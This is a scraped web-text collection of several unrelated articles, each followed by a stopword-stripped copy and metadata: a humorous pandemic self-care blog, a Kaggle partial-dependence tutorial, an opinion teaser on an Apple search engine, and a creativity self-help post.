You’re skeptical That’s cool Researching mask turned summer project spent week digging article website Finally reliable newspaper published piece explaining mask filtration work Basically Yes coronavirus smaller 3 micron 1 micron exact doesn’t mean anything two reason Viruses always attach larger particle Nobody inhales freefloating virus inhale droplet always 10 micron bigger You’re filtering droplet virus attached naked virus particle Masks 3 micron filtration capture particle smaller phenomenon called “Brownian motion” mean small particle move jagged zigzag pattern increase chance they’ll get snagged you’ve got plan decent mask Start taking Vitamin taking multivitamin top expert starting learn you’re topped Vitamin probably lesser risk dying coronavirus Hey might well try take supplement drink milk orange juice eat salmon make sure spend half hour outside Yes every day can’t sit window read I’m lazy checked Glass block specific spectrum light body need Start eating veggie immune system like healthy food Dark green Kale Spinach Broccoli Asparagus Plus onion tomato Even 2yearold eats kale mix bunch vegetable kale giant batch pour balsamic lemon juice Add pepper feta cheese olive oil eat day Start making elderberry syrup study show help reduce duration severity flu virus Buying elderberry syrup bottle expensive make buy elderberry bulk find kind recipe syrup online Stop drinking much You’re going need liver Alcohol bad basically everything else body New study killed cozy idea drinking moderation might improve health Basically downside boozing far outweigh benefit Alcohol might lower risk heart disease increase risk cancer liver disease know suck We’ve using health excuse justify drinking helluva lot usual year You’re gonna reel get drink week get one two drink maximum It’s almost like even worth know number one reason people drink boredom guess you’ll need find hobby Let’s move mental emotional health Learn okay mess first six month chore relaxed Seeing perfectly clean sink brought peace Folding laundry calmed something changed Work got busy toddler developed advanced messmaking skill Keeping house clean morphed set 
expectation placing sacrificed sleep keep everything tidy stop Upon reflection figured stress cleaning Chores way feel like control Learn nothing answer stress cleaning learning let go control literally stop brain nothing ten fifteen minute easier thought ready break give one I’m cured handful dirty dish sink doesn’t stress anymore can’t afford let nothing relaxing thing world right beat everything else Stop trying relax Relaxing overrated pandemic era doesn’t work finally realized everything trying “chill out” overstimulating triggering favorite show made think much future much past nothing Or… Stop revenge bedtime procrastination already weren’t getting enough sleep pandemic Part problem convince stay late we’re trying steal back part day Japanese call “Revenge bedtime procrastination” best name everything Sleep important ever you’re tired Samuel L Jackson say go fck sleep man It’s almost winter You’re mammal body want hibernate Let doesn’t mean sleeping next six month cave mean going bed feel tired regardless time I’ve going around 10 pm night two three hour early taste it’s giving lot energy wake 5 6 ready go Finally become morning person you’re stuck quarantine family super early morning basically way work peace Back June could work distraction disruption Sometimes still making norm wearing actually want productive I’ll wake 4 work hour kid arises help make rest day relaxing Stop trying talk news know happens try talk news think talk anyway feel guilty vicious cycle want gleefully speculate Trump’s going relapse Get system Remember laugh Take world seriously seriously freaking first presidential debate top Google search next day “move New Zealand” Jim Carey Alec Baldwin saved u reminded u comically absurd entire debate Don’t forget laugh provides perspective also boost immune system watch comedy Tell joke sarcastic Find happiness surprise often I’m actually happy follow advice almost feel like world isn’t falling apart feel prepared worst case scenario I’m scared bottom anymore know we’ll next six month know what’s going happen it’s matter getting upgrade mask Take vitamin Eat veggie Cool alcohol Go sleep you’re tired Stop stress cleaning house Remind nothing Stop trying hard pandemic Don’t forget laughTags Mindfulness Humor Health Culture Society
3,805
Tackling Kaggle’s Mercedes-Benz Greener Manufacturing Competition with Python
Photo by Markus Spiske on Unsplash Introduction In this part, we’ll perform exploratory data analysis (EDA) on our data, which is a crucial part of most machine learning problems. Although we might not end up increasing our score, we will draw invaluable insights from our data, which is often one of the primary objectives of real-world machine learning. We are going to use some of the traditional EDA techniques, but we’ll also touch on a few underused ones as well. You can find the notebook for this tutorial here. Without further ado, let’s get coding (in Colab)! Ceteris Paribus From the previous article, we have a vague idea of what partial dependence is, the problem it tries to solve, and how it does so. However, quite a few of the details were left out, so this article will be devoted to filling those empty spots. First, let’s talk about what ‘with all other things being equal’ means. Suppose we have a smaller version of our dataset, which could look something like this: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ And we’d like to know how the dependent variable reacts to different values of ‘X5’. In order to do so, we must modify our dataset so that all variables but ‘X5’ remain the same. How would we do that? Well, it’s as simple as replacing all instances of ‘X5’ with the class we’d like to know the average test time of. So we’d have 3 (number of classes in ‘X5’) different versions of our dataset and in each one, ‘X5’ is a constant: Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 99 | | 0 | 1 | 0 | a | 97 | | 1 | 1 | 1 | a | 102 | | 1 | 0 | 0 | a | 97.5 | | 0 | 0 | 0 | a | 96.5 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 99 | | 0 | 1 | 0 | b | 97 | | 1 | 1 | 1 | b | 102 | | 1 | 0 | 0 | b | 97.5 | | 0 | 0 | 0 | b | 96.5 | | 1 | 0 | 1 | b | 102.9 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 99 | | 0 | 1 | 0 | c | 97 | | 1 | 1 | 1 | c | 102 | | 1 | 0 | 0 | c | 97.5 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.9 | +------+------+------+----+-------+ There are now 3 variations of our dataset, where the only difference between them is ‘X5’ (that is, all other things are equal). All that’s left is simply taking the average of the dependent values of each of the datasets above. But there’s obviously a huge problem we face: The dependent values are for the original dataset, not the modified ones. For example, in the first row, ‘y’ = 99 is the test time for ‘X5’ = ‘a’, not ‘b’ or ‘c’. Thus, we need a way to find the dependent value for a row not present in our dataset. Fortunately, we have the tools to do exactly that. A “Partial” Solution In part 2 of this series, we built a slightly tuned Random Forest and guess what it can do? Estimate the test time of a vehicle, which is just what we need. We can simply use our model to predict the dependent values of datasets A, B, and C (the y-values shown here are most likely not consistent and make no sense at all. 
But that’s besides the point): Dataset A: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | a | 100 | | 0 | 1 | 0 | a | 98 | | 1 | 1 | 1 | a | 105 | | 1 | 0 | 0 | a | 97 | | 0 | 0 | 0 | a | 95 | | 1 | 0 | 1 | a | 102.9 | +------+------+------+----+-------+ Dataset B: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | b | 90 | | 0 | 1 | 0 | b | 99 | | 1 | 1 | 1 | b | 105 | | 1 | 0 | 0 | b | 97 | | 0 | 0 | 0 | b | 96 | | 1 | 0 | 1 | b | 102 | +------+------+------+----+-------+ Dataset C: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | y | +------+------+------+----+-------+ | 0 | 0 | 1 | c | 90 | | 0 | 1 | 0 | c | 105 | | 1 | 1 | 1 | c | 100 | | 1 | 0 | 0 | c | 97.1 | | 0 | 0 | 0 | c | 96.5 | | 1 | 0 | 1 | c | 102.1 | +------+------+------+----+-------+ Now we can take the average of the dependent values to get a reasonably close estimate for the average test time of vehicles with a specific ‘X5’. This method, like any other, has its own disadvantages: For starters, it’s only as good as our model. Therefore, if our model’s not very accurate, the results we get aren’t very reliable and might even be worse than taking the average of the original y-values. Another issue that arises with the use of partial dependence is that not all categories are compatible. For instance, let’s go back to the example of ‘X5’ and how its value can correspond to the level of climate consciousness of the owner. And we’ll also add a made-up column, called ‘X1000’, that includes 26 categories (‘a’, ‘b’, …, ‘z’) , relating to the type of AC used in a car. Now, assume ‘a’ is a type of AC which is cheap but comes at the expense of being inefficient relative to the amount of gas used and therefore damaging to the climate. But on the other end of the alphabet, we have ‘z’, a costly but climate-smart option for customers feeling guilty about themselves and their carbon footprint. In that case, if someone chooses ‘X5’ = ‘ag’ (which, remember, is the fuel-efficient type of tire), they’re most likely not going to choose ‘a’ as their AC because why order a cheeseburger combo with a diet Coke? However, for every data point in our dataset, partial dependence pairs all classes in ‘X5’ with it, even if the new rows are erroneous. This issue can be illustrated as follows: Original: +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'aa' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | aa | y | | 1 | 1 | 1 | aa | z | | 1 | 0 | 0 | aa | a | | 0 | 0 | 0 | aa | b | +------+------+------+----+-------+ Partial dependence for 'X5' = 'ag' +------+------+------+----+-------+ | X314 | X119 | X127 | X5 | X1000 | +------+------+------+----+-------+ | 0 | 0 | 1 | ag | y | | 1 | 1 | 1 | ag | z | | 1 | 0 | 0 | ag | a | | 0 | 0 | 0 | ag | b | +------+------+------+----+-------+ Please note that, in the first example, climate-smart ‘X5’ options (‘ag’) go with climate-smart ‘X1000’ options (‘y’ and ‘z’) and carbon-emitting ‘X5’ options (‘aa’) go with carbon-emitting ‘X1000’ options (‘a’ and ‘b’), as is expected from customers with different views on climate-related issues. 
But in the second and third examples, climate-smart ‘X5’ options go with carbon-emitting ‘X1000’ options and carbon-emitting ‘X5’ options go with climate-smart ‘X1000’ options, which is the opposite of what is expected from (both green and non-green) customers. This could potentially be a problem because: (1) our model can’t make accurate predictions for rows which aren’t from the same distribution as our training set, or (2) even if our model is nearly perfect when it comes to generalization, some rows might not even make theoretical sense and hence, we shouldn’t include them when doing partial dependence. Such an example would be a car made in the 1800s equipped with a turbocharger, etc. And lastly, perhaps partial dependence’s biggest problem in real-world machine learning is the amount of time it can take. For a dataset with a couple hundred thousand rows and a few hundred features with high cardinalities, performing partial dependence would be infeasible, especially if our model takes a long time for inference. A typical workaround is using only a small subset of the rows we’re given or doing partial dependence only for the features we really care about (the former shouldn’t change the results drastically as long as our mini-dataset is representative of the actual one). Despite all its imperfections, however, partial dependence is still an extremely powerful tool which enables you to gain insights into your dataset that traditional EDA methods simply can’t provide, and these insights can then be turned into better business decisions which could maximize profit and impact. There are numerous such examples, and here we’ll go through one together. Bulldozer Auction A while ago, I wrote a series about a Kaggle competition where the goal was to successfully predict the auction price of a bulldozer given various features such as its size, the ID of the auctioneer, and a lot more, with most being technical terms not everyone (including me) understands. In one of the later articles, we realized the column containing the year the bulldozers were made (‘YearMade’) is very important to our model’s performance, which is probably no surprise to bulldozer professionals. However, we didn’t know how ‘YearMade’ affects the sale prices of the heavy equipment: Do they increase monotonically? Would a plot of ‘YearMade’ against the dependent variable be all over the place? Or perhaps as ‘YearMade’ increases, the sale price decreases? Logically, the first scenario should be the case, but we need a way to prove that. You can probably see where this is going… The first thing that jumps to mind is taking the average of all sale prices for all years and seeing what that gives us. If our hypothesis is indeed true, we should get an increasing line/curve, right? But it turns out if we do that, there’d be a dip around ‘YearMade’ = 2000, which would mean bulldozers made in the early 1990s sell for more than the ones made in the late 1990s, contrary to our speculation. (Picture from the ‘Introduction to Machine Learning for Coders’ course.) The organizers of the auctions might then decide that since bulldozers made in the late 1990s sell for less than the ones made in the early 1990s, the former aren’t worth their time, so they’ll stop auctioning them. By now, you should be suspicious of conclusions drawn by taking averages and resort to using partial dependence instead. If you do so for this bulldozer dataset, the result will be very different from the above graph and confirm our initial hypothesis. 
(Picture from the ‘Introduction to Machine Learning for Coders’ course.) Please note that the yellowish line is what we should be looking at (just ignore the blue ones for now) and the y-axis is the log of the dependent variable. As we can see, ‘YearMade’ and the y-axis have an almost linear relationship, which means that, in reality, sale prices grow exponentially with respect to the year our bulldozers were made. There are a few possible explanations for the inconsistency between the two plots: recession, differences in the quality of the bulldozers made during various time intervals, etc. Whichever the case, however, we can be certain that if two bulldozers are identical in all ways but the year they were made, the older one will have a lower sale price. But if the auction organizers make their decisions based on the initial plot, they wouldn’t know that and would lose big sums of money by not auctioning heavy equipment made in certain years. Conclusion In this part, we saw how partial dependence works behind the scenes and frankly, it’s not very complicated: In order to calculate the true average of the dependent value for a category c (or a continuous value) in a feature F, it sets F to c for all rows in our dataset (or a subset of it, if it’s too big) and uses a predictive model to figure out the dependent values for these modified rows. It then takes the average of the predictions made by our model, and that’s basically what we’re looking for (there are a few other steps involved, but that’s the general idea; a short illustrative code sketch of this loop is included below). Admittedly, partial dependence does come with its own particular challenges, the major ones being the issue of some categories not being compatible with each other (a car made in the 1800s with autopilot) and the fact that it can be time- and resource-consuming sometimes. Nevertheless, it’s still a great tool to have in your toolbox and can aid you in making business decisions and drawing meaningful insights from your dataset. In the next part, we’ll look at how to implement partial dependence in Python using a powerful library called PDPBox, which comes with beautiful visualizations and several other useful related tools. To be continued… Please, if you have any questions or feedback at all, feel welcome to post them in the comments below and as always, thank you for reading! Part 1: https://medium.com/python-in-plain-english/mercedes-benz-greener-manufacturing-part-1-basic-data-pre-processing-a32d17803064 Part 2: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-3ddff72d0187 Part 3: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-1ca6b030bf58 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-b5220f479a44 Part 3 (continued): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-a004659e02c4 Part 4: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-82dd27e53757 Part 5: https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-e31198ecafae Part 5 (final part): https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-ecbd2714d952 Twitter: https://twitter.com/bobmcdear GitHub: https://github.com/bobmcdear
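To make that loop concrete, here is a minimal Python sketch of the manual "force the feature to one value, predict, average" procedure described above. This is not the author's notebook code and not the PDPBox API; it is only an illustration under a few assumptions: model is any already-fitted regressor exposing a scikit-learn-style .predict() method, df is a pandas DataFrame holding the feature columns in the same (already encoded) form the model was trained on, and names such as partial_dependence, rf_model, X_train, and 'X5' are hypothetical placeholders.

import numpy as np

def partial_dependence(model, df, feature, values=None, sample_size=None, random_state=42):
    """Return {value: average prediction with `feature` forced to `value`}."""
    # Optionally work on a subsample to keep runtime manageable on large
    # datasets (the workaround mentioned earlier in the article).
    if sample_size is not None and sample_size < len(df):
        df = df.sample(n=sample_size, random_state=random_state)
    # By default, sweep over every value the feature actually takes.
    if values is None:
        values = df[feature].unique()
    averages = {}
    for value in values:
        modified = df.copy()        # keep 'all other things equal'
        modified[feature] = value   # force the whole column to a single value
        averages[value] = float(np.mean(model.predict(modified)))
    return averages

# Hypothetical usage: average predicted test time for each class of 'X5',
# estimated on a 1,000-row subsample.
# pdp_x5 = partial_dependence(rf_model, X_train, 'X5', sample_size=1000)

The optional sample_size argument mirrors the subsampling workaround discussed above: when inference is slow, running the loop on a representative subset of rows usually changes the resulting averages very little.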
https://medium.com/python-in-plain-english/tackling-kaggles-mercedes-benz-greener-manufacturing-competition-with-python-7b203e886f8d
['Borna Ahmadzadeh']
2020-12-27 18:10:47.421000+00:00
['Machine Learning', 'Artificial Intelligence', 'AI', 'Data Science', 'Data Visualization']
Title Tackling Kaggle’s MercedesBenz Greener Manufacturing Competition PythonContent Photo Markus Spiske Unsplash Introduction part we’ll perform exploratory data analysis EDA data crucial part machine learning problem Although might end increasing score draw invaluable insight data often one primary objective realworld machine learning going use traditional EDA technique we’ll also touch underused one well find notebook tutorial Without ado let’s get coding Colab Ceteris Paribus previous article vague idea partial dependence problem try solve However quite detail left article devoted filling empty spot First let’s talk ‘with thing equal’ mean Suppose smaller version dataset could look something like X314 X119 X127 X5 0 0 1 99 0 1 0 b 97 1 1 1 c 102 1 0 0 975 0 0 0 b 965 1 0 1 c 1029 we’d like know dependent variable reacts different value ‘X5’ order must modify dataset variable ‘X5’ remain would Well it’s simple replacing instance ‘X5’ class we’d like know average test time we’d 3 number class ‘X5’ different version dataset one ‘X5’ constant Dataset X314 X119 X127 X5 0 0 1 99 0 1 0 97 1 1 1 102 1 0 0 975 0 0 0 965 1 0 1 1029 Dataset B X314 X119 X127 X5 0 0 1 b 99 0 1 0 b 97 1 1 1 b 102 1 0 0 b 975 0 0 0 b 965 1 0 1 b 1029 Dataset C X314 X119 X127 X5 0 0 1 c 99 0 1 0 c 97 1 1 1 c 102 1 0 0 c 975 0 0 0 c 965 1 0 1 c 1029 3 variation dataset difference ‘X5’ thing equal that’s left simply taking average dependent value datasets there’s obviously huge problem face dependent value original dataset modified one example first row ‘y’ 99 test time ‘X5’ ‘a’ ‘b’ ‘c’ Thus need way find dependent value row present dataset Fortunately tool exactly “Partial” Solution part 2 series built slightly tuned Random Forest guess Estimate test time vehicle need simply use model predict dependent value datasets B C yvalues shown likely consistent make sense that’s besides point Dataset X314 X119 X127 X5 0 0 1 100 0 1 0 98 1 1 1 105 1 0 0 97 0 0 0 95 1 0 1 1029 Dataset B X314 X119 X127 X5 0 0 1 b 90 0 1 0 b 99 1 1 1 b 105 1 0 0 b 97 0 0 0 b 96 1 0 1 b 102 Dataset C X314 X119 X127 X5 0 0 1 c 90 0 1 0 c 105 1 1 1 c 100 1 0 0 c 971 0 0 0 c 965 1 0 1 c 1021 take average dependent value get reasonably close estimate average test time vehicle specific ‘X5’ method like disadvantage starter it’s good model Therefore model’s accurate result get aren’t reliable might even worse taking average original yvalues Another issue arises use partial dependence category compatible instance let’s go back example ‘X5’ value correspond level climate consciousness owner we’ll also add madeup column called ‘X1000’ includes 26 category ‘a’ ‘b’ … ‘z’ relating type AC used car assume ‘a’ type AC cheap come expense inefficient relative amount gas used therefore damaging climate end alphabet ‘z’ costly climatesmart option customer feeling guilty carbon footprint case someone chooses ‘X5’ ‘ag’ remember fuelefficient type tire they’re likely going choose ‘a’ AC order cheeseburger combo diet Coke However every data point dataset partial dependence pair class ‘X5’ even new row erroneous issue illustrated follows Original X314 X119 X127 X5 X1000 0 0 1 ag 1 1 1 ag z 1 0 0 aa 0 0 0 aa b Partial dependence X5 aa X314 X119 X127 X5 X1000 0 0 1 aa 1 1 1 aa z 1 0 0 aa 0 0 0 aa b Partial dependence X5 ag X314 X119 X127 X5 X1000 0 0 1 ag 1 1 1 ag z 1 0 0 ag 0 0 0 ag b Please note first example climatesmart ‘X5’ option ‘ag’ go climatesmart ‘X1000’ option ‘y’ ‘z’ carbonemitting ‘X5’ option ‘aa’ go carbonemitting ‘X1000’ option ‘a’ ‘b’ expected customer 
different view climaterelated issue second third example climatesmart ‘X5’ option go carbonemitting ‘X1000’ option carbonemitting ‘X5’ option go climatesmart ‘X1000’ option opposite expected green nongreen customer could potentially problem model can’t make accurate prediction row aren’t distribution training set Even model nearly perfect come generalization row might even make theoretical sense hence shouldn’t include partial dependence example would car made 1800s equipped turbocharger etc lastly perhaps partial dependence’s biggest problem realworld machine learning amount time could take dataset couple hundred thousand row hundred feature high cardinality performing partial dependence would infeasible especially model take long inference typical workaround using small subset row we’re given partial dependence feature really care former shouldn’t change result drastically long minidataset representative actual one Despite imperfection however partial dependence still extremely powerful tool enables gain insight dataset traditional EDA method simply can’t insight could turned better business decision could maximize profit impact numerous example we’ll go one together Bulldozer Auction ago wrote series Kaggle competition goal successfully predict auction price bulldozer given various feature size ID auctioneer lot technical term everyone including understands one later article realized column containing year bulldozer made ‘YearMade’ important model’s performance probably surprise bulldozer professional However didn’t know ‘YearMade’ affect sale price heavy equipment increase monotonically Maybe plotting ‘YearMade’ dependent variable place perhaps ‘YearMade’ increase sale price decrease Logically first scenario case need way prove probably see going… first thing jump mind taking average sale price year seeing give u hypothesis indeed true get increasing linecurve right turn there’d dip around ‘YearMade’ 2000 would mean bulldozer made early 1990s sell one made late 1990s contrary speculation Picture ‘Introduction Machine Learning Coders’ course organizer auction might decide since bulldozer made late 1990s sell le one made early 1990s former isn’t worth time they’ll stop auctioning suspicious conclusion drawn taking average resort using partial dependence instead bulldozer dataset result different graph confirm initial hypothesis Picture ‘Introduction Machine Learning Coders’ course Please note yellowish line looking ignore blue one yaxis log dependent variable see ‘YearMade’ yaxis almost linear relationship mean reality sale price grow exponentially respect year bulldozer made possible explanation inconstistency two plot Recession difference quality bulldozer made various time interval etc Whichever case however certain two bulldozer identical way year made older one lower sale price auction organizer make decision based initial plot wouldn’t know would lose big sum money auctioning heavy equipment made certain year Conclusion part saw partial dependence work behind scene frankly it’s complicated order calculate true average dependent value category c continuous value feature F set F c row dataset subset it’s big us predictive model figure dependent value modified row take average prediction made model that’s basically we’re looking step involved that’s general idea Admittedly partial dependence come particular challenge major one issue category compatible car made 1800s autopilot fact time resource consuming sometimes Nevertheless it’s still great tool toolbox aid making business 
decision drawing meaningful insight dataset next part we’ll look implement partial dependence Python using powerful library called PDPBox come beautiful visualization several useful related tool continued… Please question feedback feel welcome post comment always thank reading Part 1 httpsmediumcompythoninplainenglishmercedesbenzgreenermanufacturingpart1basicdatapreprocessinga32d17803064 Part 2 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython3ddff72d0187 Part 3 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython1ca6b030bf58 Part 3 continued httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythonb5220f479a44 Part 3 continued httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythona004659e02c4 Part 4 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpython82dd27e53757 Part 5 httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythone31198ecafae Part 5 final part httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythonecbd2714d952 Twitter httpstwittercombobmcdear GitHub httpsgithubcombobmcdearTags Machine Learning Artificial Intelligence AI Data Science Data Visualization
3,806
How Apple Can Make Money Through a Search Engine
OPINION How Apple Can Make Money Through a Search Engine How Apple can make up for losing $12 Billion Created with Canva Design Congress wants to break up Google, claiming it has illegally thrashed the competition in the search engine market. Google dominates the market with an 86.86% market share as of July 2020. The argument is that Google pays billions of dollars to other companies to become the default search engine for their users. In 2019, Google paid $30bn for “traffic acquisition costs”, almost a third of its entire search revenue. This was up from $26.7bn the previous year, and up from just $6.2bn a decade earlier. Google reportedly paid $12 Billion to Apple to make Google the default search engine on Safari for iPhones. This means that if Google is regulated, Apple would lose around $12 Billion each year, which amounts to 1/5 of all its services revenue. Apple depends on Google, and those ties can be cut at any time. As an alternative, Apple is rumored to be working on its own search engine — Apple Search. So, how does Apple plan to monetize it and make up for the $12 Billion?
https://medium.com/datadriveninvestor/how-apple-can-make-money-through-a-search-engine-12e018a58154
['Shubh Patni']
2020-11-14 14:06:37.266000+00:00
['Technology', 'Google', 'Apple', 'Innovation', 'Business']
Title Apple Make Money Search EngineContent OPINION Apple Make Money Search Engine Apple make losing 12 Billion Created Canva Design Congress want break Google claiming illegally thrashed competition search engine market Google dominates market 8686 market share July 2020 argument Google pay billion dollar company become default search engine consumer 2019 Google paid 30bn “traffic acquisition costs” almost third entire search revenue 267bn previous year 62bn decade earlier Google reportedly paid 12 Billion Apple make Google default search engine Safari iPhones mean Google regulated Apple would lose around 12 Billion year amount 15 service revenue Apple depends Google tie cut anytime alternative Apple rumored working search engine — Apple Search Apple plan monetize make 12 BillionTags Technology Google Apple Innovation Business
3,807
How to Unleash Your Creativity in 30 Minutes a Day
Give some of the following methods a shot for 30 minutes each day to release your creativity: Nostalgia to the rescue! Harken back to your childhood. Did you have an active imagination? When I was in 3rd grade my teacher, Mrs. Bermudez gave myself and two friends all the extra worksheets she had left over from the year. We took possibly three bags of school work home. I set out to be a teacher. I arranged my teddy bears and dolls, made desks of cardboard boxes, and set out to teach. I did the assignments (since teddy bears cannot write), and pretended to grade their work. The interesting fact? I am a teacher who works with men and women educating them on domestic violence and anger management. Who knew a creative side would turn into a real life career move? Maybe you pretended you were a teacher or a doctor. Or, you thought you were a grand hero, like Spider-man or a famous hunter, playing in the woods. Perhaps you played as if you were the greatest skateboarder or a champion football player. Borrowing different personas is a fun way to show your creativity. Right now, imagine yourself as a successful and talented worker at your current profession. What would you wear? What about behaviors, your style, or your hairdo? What would you communicate to others or to the media? How would you relate? Visualize that you’re the greatest at something you enjoy doing for at least 10 minutes each day. If you can see it, you can achieve it. What are you good at? Imagination is powerful. As you develop the skills of creativity, you’ll find the ability to focus on what you excel at and what you’ve accomplished. Do you have specific skills or talents which you thrive in discussing? For the next 10, 20, or 30 minutes, consider your various skills, talents, and knowledge base. After your mind has toyed with the ideas, pick one skill to focus upon with intention. What makes you shine with particular ability you chose? Are you focused and follow instructions well? What about listening skills or speaking skills? If you noticed what others say, or feel when they share their thoughts, you can write about the way you are impacted. You quickly pick up on what’s expected of you. Consider if you find yourself internally motivated to accomplish jobs in a timely manner, or you can find ways to improve work performance. Take some time to write out how you create time saving documents or lists. When you know what you excel at, you feel confident. And when you’re confident, you’re not afraid to try new things and experiment (which are aspects of being creative). Let your mind fantasize about anything amazing in your life. My brother used to dream about buying an expansive house on the hill in Washington State. He’d tell me what he would do and how he’d have a room just for model making. Maybe, you’ll thrive with dreaming about a love relationship. Give yourself 30 minutes to sit back and dream. Imagine what the inside of the house looks like. Consider where you’d have a craft room, or even a holiday feast. Picture the face of a potential mate. Imagine what your first encounter would be and what you will wear to meet them. Create and laminate an index card for your pocket. On the index card, write your top 3 life goals. Keep the card in an easy place to take out and look at when you have a few minutes. The concept here is to remind yourself of the goals and dreams you have. Your future self needs to be reminded in the present of what you love, long for, and plan to accomplish. Ponder how you want to achieve the goals. 
Savor the victory. Cherish the wish. And visualize yourself arriving with accolades of honor. Remember, you hold the creative power to pursue every goal. You decide the process. Let your mind run free. Consider the following questions: what can you do today, tomorrow, next week, and next month to go after your goals? What mini steps can you take today to get you headed toward tomorrow’s success? Take massive action to head toward your dreams. Role models help us grow. Identify someone you admire or hold in high regard. I enjoy the research involved in studying famous psychologists, neurologists, or criminal forensic scientists. The ideas they present inspire my work with the justice system helping prevent violence. As I consider their history, success, and focus, I become inspired to keep pursuing my dreams. Ask yourself, what is it about them you like? How would your life improve if you acted or believed as they do? Sometimes the personality or the traits we see in others make us feel happy, or content. If we were to act as if we had the same trait, we’d begin to demonstrate the same behaviors. Usually if you are around someone for 10 minutes a day, you’ll start acting like the person. Be mindful who you study! For the next month, emulate the characteristic you admire. Maybe Joe gets to work on time, has a positive attitude, and tackles the job without criticizing the managers or leaders. As you notice the different characteristics of Joe, you may start to emulate him by ceasing negative self-talk about the leadership team, even if you feel justified. Find a way to look at the good around you and share what you see. Trying on new personal characteristics allows you to stretch yourself creatively to see what you can do. Try something new. Experiment with a new creative activity. Explore arts and craft stores: buy a block of clay, a jewelry-making kit, or some paints and canvases. Look on Pinterest for Do-It-Yourself creative ideas. Find a way to incorporate the artistic side into your schedule once a week. As we cultivate creativity, we build an artistic side we may not have realized we had in the past. One of the benefits of setting a time limit (30 minutes) on the project is that you do not have to complete it all in one sitting. It’s possible you’ll go over the half-hour mark; however, it’s the creativity you are looking at, not necessarily the time. Your skills will expand, and your time for ‘away’ from work activities becomes an event you look forward to. Art or creative craft classes at local stores may be perfect to get you interested. Sometimes they are classes you take once and then move on; at other times they run for several weeks, once a day. Start with what feels comfortable for you. As you build creativity in your life, you’ll begin to feel the imagination take off. Working with your hands and mind together opens up new avenues. Release the innovator inside. Delve into 30 minutes of pure invention-focused growth. When you focus your energy on any of the above strategies, or connect 2 or 3 of them together, you’ll find yourself developing a new set of coping strategies, reducing stress, building resourcefulness, as well as connecting with the younger version of you. Believe in yourself. You are a creative individual. As you feel more confident, you’ll prove you have talent. Take the time to do something which cultivates your imagination and originality either daily or weekly. 
As I consider my favorite artist side, I realize I have let it slide too much and need to return to my first love: the arts. Maybe, after you read the above article, you too want to delve in and explore a side of you not yet found, or one which lies dormant under the surface of hustle and bustle. I encourage you to step up and find the artist inside! ~Just a thought by Pamela
https://medium.com/change-your-mind/how-to-unleash-your-creativity-in-30-minutes-a-day-44160ec32737
['Pamela J. Nikodem']
2020-11-21 11:02:37.873000+00:00
['Self', 'Mental Health', 'Growth', 'Creativity', 'Art']
Title Unleash Creativity 30 Minutes DayContent Give following method shot 30 minute day release creativity Nostalgia rescue Harken back childhood active imagination 3rd grade teacher Mrs Bermudez gave two friend extra worksheet left year took possibly three bag school work home set teacher arranged teddy bear doll made desk cardboard box set teach assignment since teddy bear cannot write pretended grade work interesting fact teacher work men woman educating domestic violence anger management knew creative side would turn real life career move Maybe pretended teacher doctor thought grand hero like Spiderman famous hunter playing wood Perhaps played greatest skateboarder champion football player Borrowing different persona fun way show creativity Right imagine successful talented worker current profession would wear behavior style hairdo would communicate others medium would relate Visualize you’re greatest something enjoy least 10 minute day see achieve good Imagination powerful develop skill creativity you’ll find ability focus excel you’ve accomplished specific skill talent thrive discussing next 10 20 30 minute consider various skill talent knowledge base mind toyed idea pick one skill focus upon intention make shine particular ability chose focused follow instruction well listening skill speaking skill noticed others say feel share thought write way impacted quickly pick what’s expected Consider find internally motivated accomplish job timely manner find way improve work performance Take time write create time saving document list know excel feel confident you’re confident you’re afraid try new thing experiment aspect creative Let mind fantasize anything amazing life brother used dream buying expansive house hill Washington State He’d tell would he’d room model making Maybe you’ll thrive dreaming love relationship Give 30 minute sit back dream 